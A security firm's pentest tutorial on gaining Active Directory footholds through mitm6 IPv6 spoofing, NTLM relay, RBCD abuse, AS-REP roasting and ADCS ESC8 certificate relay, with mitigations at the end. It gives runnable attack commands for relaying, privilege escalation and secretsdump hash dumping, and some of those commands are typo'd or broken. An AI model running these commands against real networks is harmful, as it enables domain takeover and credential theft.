Insider Insights: Strategies For Initial Access In An Internal Pentest Part 2

Introduction

In our Initial Access In An Internal Pentest Part 1, we shared six ways to gain a foothold in internal penetration testing using the NTLM Relay technique in combination with Responder and impacket-ntlmrelayx procedures. This blog post will continue exploring new tactics and techniques, such as Coercions and exploiting protocols such as IPv6, LDAP, Resource Based Constraint delegation (RBCD), and Active Directory Certificate Services (ADCS). These techniques can be used to obtain either domain admin privileges or initial access.

The following 4 techniques and procedures will demonstrate how to gain a foothold.

Mitm6 is a tool that enables attackers to intercept, read, modify, and inject packets into IPv6 communication channels. It exploits IPv6’s Neighbor Discovery Protocol (NDP) and ICMPv6 messages to perform attacks. Attackers can use Mitm6 to test the security of IPv6 networks, identify vulnerabilities, and perform various attacks such as eavesdropping, injecting malicious packets, or performing a DoS attack. To use Mitm6, attackers set up a rogue router or access point, configure Mitm6 to listen for NDP messages, and then intercept packets to analyze, modify, or inject new ones.

Mitm6 is a crucial tool for internal penetration testing because it enables you to intercept and manipulate encrypted and secure traffic. With Mitm6, we can access sensitive data, including user credentials, session tokens, and other confidential information. Moreover, this tool can inject malicious code into network traffic, allowing you to exploit application and service vulnerabilities.

Attack 1: Domain Information Dumping

Pre-requisite steps to perform this attack.

  • The IPv6 protocol MUST be enabled: Fortunately, the IPv6 protocol is enabled by default in all modern Windows systems, including Windows 10 and Windows Server 2016 and later.
  • Since Windows servers have SMB signing enabled by default, we will use LDAP protocol instead.
  • Mitm6 and ntlmrelayx: In order to execute the attack, we will have to execute the below commands:
mitm6 -d hydra.marvel.local -i eth1
/usr/local/bin/ntlmrelayx.py -t ldaps://192.168.115.140 -wh wpad

As shown in the image, the wkstn-1_HYDRA.MARVEL.local workstation (192.168.115.142) triggered an authentication request, and the tool impacket-ntlmrelayx was authenticated using the computer account called HYDRA/WKSTN-1$ credentials to access DC2.HYDRA.MARVEL.local (192.168.115.140) and dump the Domain Information from DC2.

The tool ntlmrelayx.py was authenticated to the DC2.HYDRA.MARVEL.local via LDAP protocol (Domain Controller) and dumped the domain information, including users, computers, groups, policies, and trusts into the lootdir.

Attack 2: IPv6 Spoofing & RBCD & NTLM Relay

Resource-Based Constrained Delegation (RBCD) was introduced in Windows Server 2012 to enable restricted delegation across domains. This is a safer way to allow services to act on behalf of other users and how these more secure delegation means can be hardened to further defend against attacks.

In Resource-Based Constrained Delegation (RBCD), the list of services that can access a target service as another user is stored in Active Directory with the target service in its ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity attribute.

Mitm6 and ntlmrelayx: In order to execute the attack, we will have to execute the below commands:

impacket-ntlmrelayx -t ldaps://192.168.115.140 -wh wpad --delegate-access --add-computer initialaccess 'Passw0rd@12345'
mitm6 -d hydra.marvel.local -i eth1
OPTIONAL:
impacket-ntlmrelayx -t ldaps://192.168.115.140 -wh wpad --delegate-access

As shown in the image, the wkstn-1_HYDRA.MARVEL.local workstation (192.168.115.142) attempted to access an SMB share. During this attempt, the tool impacket-ntlmrelayx utilized the authentication credentials of the computer account HYDRA/WKSTN-1$ to gain access to DC2.HYDRA.MARVEL.local (192.168.115.140) through the LDAP(s) protocol. A new computer called “initialaccess” was created with the password “Passw0rd@12345”, and the delegation rights in the newly created computer, “initialaccess$“, were modified. This implies that the “initialaccess$” computer can impersonate users on WKSTN-1$ via the S4U2Proxy technique.

The next step is to request the local administrator Ticket Granting Ticket (TGT) using the impacket-getST tool, which will use the S4U2Proxy technique by executing the below command:

impacket-getST -spn 'cifs/wkstn-1.hydra.marvel.local' -impersonate administrator -dc-ip 192.168.115.140 'HYDRA'/'initialaccess$':'Passw0rd@12345'

Once the TGT is obtained, we can use impacketsecredumpt tool to dump the SAM database from the wkstn-1.hydra.marvel.local computer.

Attack 3: AS-REP Roasting & Escalate User

Pre-requisite to perform this attack.

  • A vulnerable AS-REP Roasting account along with a weak or guessable password.
  • High privileges victim account to use it to relay with impacket-ntlmrelayx.

AS-REP Roasting is a technique that enables adversaries to steal the password hashes of user accounts that have Kerberos pre-authentication disabled, which they can then attempt to crack offline.

When pre-authentication is turned on, a user who wants to access a resource starts the Kerberos authentication process by sending an Authentication Server Request (AS-REQ) to the domain controller (DC). The timestamp on this message is encrypted with the hash of the user’s password. If the DC can decrypt the timestamp using its record of the user’s password hash, it will respond with an Authentication Server Response (AS-REP) message. This message includes a Ticket Granting Ticket (TGT) issued by the Key Distribution Center (KDC), which is used for future user access requests.

However, if pre-authentication is turned off, an attacker can request authentication data for any user. The Domain Controller would respond with an AS-REP message. Since part of this message is encrypted using the user’s password, the attacker can then try to guess the user’s password using a brute-force attack.

The first step is to identify domain-valid accounts; this can be done using Kerbrute, a tool designed to quickly enumerate existent accounts and brute-force valid Active Directory accounts through Kerberos Pre-Authentication. It is designed to be used on an internal Windows domain with access to one of the Domain Controllers.

This can be done by executing the below command.

kerbrute userenum -d hydra.marvel.local /root/MARVEL.local/Kerberos/user.txt --dc 192.168.115.140

Once an existing domain account is obtained, Using GetNPUsers, we can easily perform AS-REP Roasting. Simply issue the following command:

impacket-GetNPUsers -dc-ip 192.168.115.140 -usersfile ./users.txt hydra.marvel.local/

This will automatically use the accounts in the file text that do not require pre-authentication and extract their AS-REP hashes for offline cracking. In this blog, we used John the Ripper to obtain the credential material, as shown in the image below:

After obtaining the user password of the Hulk user account (credential material), we can set up the responder by desable the HTTP and SMB protocols and waiting for an administrator connection to use the impacket-ntlmrelayx tool with the –escalate-user parameter. This will help in adding the Hulk user to the domain admin group. Use the following command to achieve this:

responder -I eth1 -v
impacket-ntlmrelayx -t ldaps://192.168.115.140 -wh wpad --escalate-user hulk

The image shows that the domain admin HYDRA/BBARNES account attempted to access an SMB share. During this attempt, the tool impacket-ntlmrelayx utilized the authentication credentials to gain access to DC2.HYDRA.MARVEL.local (192.168.115.140), through the LDAP(s) protocol, modified HULK’s user privileges by adding them to the domain admin group. This implies that the “HULK” account obtained domain admin privileges over the HYDRA.MARVEL domain.

Once the escalate-user attack is successfully executed, we can corroborate whether the Hulk user was added to the domain admin group using either the netexec or impacket-psexec tool. Simply issue the following command.

netexec smb 192.168.115.140 -u hulk -p 'P@ssw0rd'
impacket-psexec hydra/hulk:'P@ssw0rd'@dc2.hydra.marvel.local

Since we have domain admin credentials, different tools, and post-exploitation attacks can be performed using the other scripts available in the Impacket toolkit, such as:

  • impacket-smbexec
  • impacket-secretsdump
  • evil-winrm
  • impacket-smbclient
  • Metasploit
  • Netexec & Empire

Attack 4: NTLM Relay Attacks & Abusing Active Directory Certificate Services (AD CS – ESC8)

It’s important to note that the ESC8 technique does not exploit certificate template misconfigurations. Rather, it takes advantage of the configuration of the Certificate Authority (CA) server.

The Active Directory Certificate Authorities that are susceptible to ESC8 must meet the following conditions:

Pre-requisite to perform this attack.

  • Web Enrollment should be enabled.
  • Request Disposition should be set to issue.

The above image shows that the Web Enrollment Service is enabled and accepts NTLM Authentication without using the Secure Sockets Layer (SSL).

In this post, we will walk through the exploitation of the Web Enrollment feature. Active Directory Certificate Services (ADCS) supports HTTP-based enrollment methods. If enabled, HTTP-based certificate enrollment interfaces can be vulnerable to NTLM relay attacks. If an attacker can coerce a victim account to authenticate to the attacker-controlled machine, the credential material can be relayed to the Certificate Authority to request a certificate on behalf of the victim.

In some cases, a relay attack may not even require domain credentials. For example, if the victim host is not patched against CVE-2021-369421, an attacker on the network could trick the victim machine into authenticating to the attacker host by abusing the vulnerable API method OpenEncryptedFileRaw through the LSARPC (Local System Authority Remote Protocol) interface.

Coerced Authentication is a technique used by attackers to gain access to a user’s account or information without the user’s knowledge or consent. This technique is often achieved through various methods, such as phishing, social engineering, or brute force attacks. Printerbug, PetitPotam, Dfscoerce, and Coercer are the most popular coercion tools to execute this technique for internal penetration testing. In this blog, we attempted to execute coercion using PetitPotam and impacket-ntlmrelayx without credentials against the domain controller called DC4.SHIELD.local.

NOTE: If we do not specify a template name, Certipy will attempt to issue a certificate using the Machine and User templates. These are default templates, but that does not mean they will be available in your target environment or apply to your victim account. In this blog, we will use the DomainController template since we will coerce DC4.SHIELD.local computer account to authenticate using PetitPotam without any credentials.

We can configure PetitPotam to coerce the authentication and Certipy to relay the coerced credential to the ADCS HTTP endpoint to request a certificate on behalf of DC4.SHIELD.local using the following commands.

python ./PetitPotam.py 192.168.115.138 192.168.115.180
certipy relay -target csa.shield.local -template 'DomainController'
certipy auth -pfx dc4.pfx

Once the hash (dc4$) or the TGT .ccache file is obtained, we can easily dump the hashes from the Domain Controller called DC4.SHIELD.local. Simply execute the following command:

impacket-secretsdump dc4$@192.168.115.180 -hashes aad3b435b51404eeaad3b435b51404ee:64704821a851393bfc6f3f503fbXXXXX

Once we have set up and launched the impacket-ntlmrelayx and PetitPotam tools, we need to wait for the connection and grap the DC4$ Certificate.

Once we have the certificate saved in a file, we can use the gettgtpkinit tool to request a TGT file in a .ccache file format that can be exported as an environment variable and used with impacket-secretsdump. Issue the following commands.

nano cert.txt
export KRB5CCNAME=dc4.ccache
impacket-secretsdump shield.local/dc4\$@dc4.shield.local -k -no-pass

We must turn off SMB and HTTP services by editing the following configuration file with an editor like Nano or Vim:

vim /etc/responder/Responder.conf

Once we have set up and launched the impacket-ntlmrelayx and Responder tools, we need to wait for the connection and grap the Administrator Certificate.

Once the .ccache file (credential material) has been obtained, we can start the post-exploitation phase and dump the user’s hashes using the impacket-secretsdump tool, as shown below.

As an alternative option, we can use the Coercer tool instead of PetitPotam to coerce the authentication and impacket-ntlmrelayx to relay the coerced credential to the ADCS HTTP endpoint to request a certificate on behalf of DC4.SHIELD.local using the following commands.

impacket-ntlmrelayx -t http://192.168.115.144/certsrv/certfnsh.asp -smb2 --adcs --template 'DomainController'
coercer coerce -d shield. local -1 192.168.115.138 -t 192.168.115.180

Once we have got the certificate, we can either use the gettgtpkinit.py tool to get the TGT Tiket or Certipy to get the NTLM hash.

nano cert.txt
python /opt/PKINITtools/gettgtpkinit.py shield.local/DC4\$ -pfx-base64 $(cat cert.txt) dc4.ccache
certipy relay -target sa.shield. local -template 'Domaincontroller
certipy auth -pfx dc4.pfx

Conclusion

As noted earlier, most organizations cannot disable these protocols entirely because other technologies in their environments still depend on them. Instead, organizations need to learn how to manage the risk. While the risk cannot be eliminated, the recommendations below can help mitigate Pass-the-Hash, SMB spoofing, LDAP, Tickets, and NTLM relay attacks.

  • Disable LLMNR/NBT-NS if possible, preventing an attacker from poisoning LLMNR/NBT-NS.
  • Turn on Extended Protection for Authentication (EPA)
  • For services that permit NTLM authentication, ensure that EPA is enabled and SMB signing is required.
  • Implement Microsoft Active Directory Tier Model – The implementation of such a model will help significantly mitigate “Credential Theft” techniques as it could be “Pass-the-Hash” or “Pass-the-ticket,” which are the basis of today’s majority security breaches.
  • Microsoft released some guidance on how to protect against the PetitPotam NTLM relay attack here.
  • Disable ADCS HTTP endpoints if they are not necessary. 
  • Disable NTLM Authentication, If possible.
  • Enforce HTTPS and enable Extended Protection for Authentication.
  • Enable requirements for SMB/LDAP signing. 
  • Enforce LDAP channel binding. 

Credits & References

Authors

  • Red Team Lead

    As a security computer expert with over 15 years of experience, he specializes in various areas such as web applications, cloud computing (AWS, Azure & GCP), infrastructure penetration testing, red & purple team assessments, vulnerability analysis, exploit development, and malware analysis. He has conducted numerous successful black-and-grey box penetration testing and adversary emulation engagements throughout his career. He has demonstrated expertise in testing SOAP and RESTful web API services, thick clients, wireless networks, internal/external assessments, SAP ERP servers, ATMs, Tactics Techniques and Procedures (TTPs), and forensics.

  • Chanel Carr

    Professional security architect of multi-clouds, including Amazon Web Services (AWS), Microsoft Azure, and Google GCP, with experience evaluating and testing computer security systems, creating firewalls, improving network security to protect the system further.

  • Asif Khan

    Highly skilled Pentester with experience in various areas, including multi-clouds (AWS, Azure, and GCP), network, web applications, APIs, and mobile penetration testing. In addition, he is passionate about conducting Red and Purple Team assessments and developing innovative solutions to protect company systems and data.

Share the Post:

Subscribe To Our Newsletter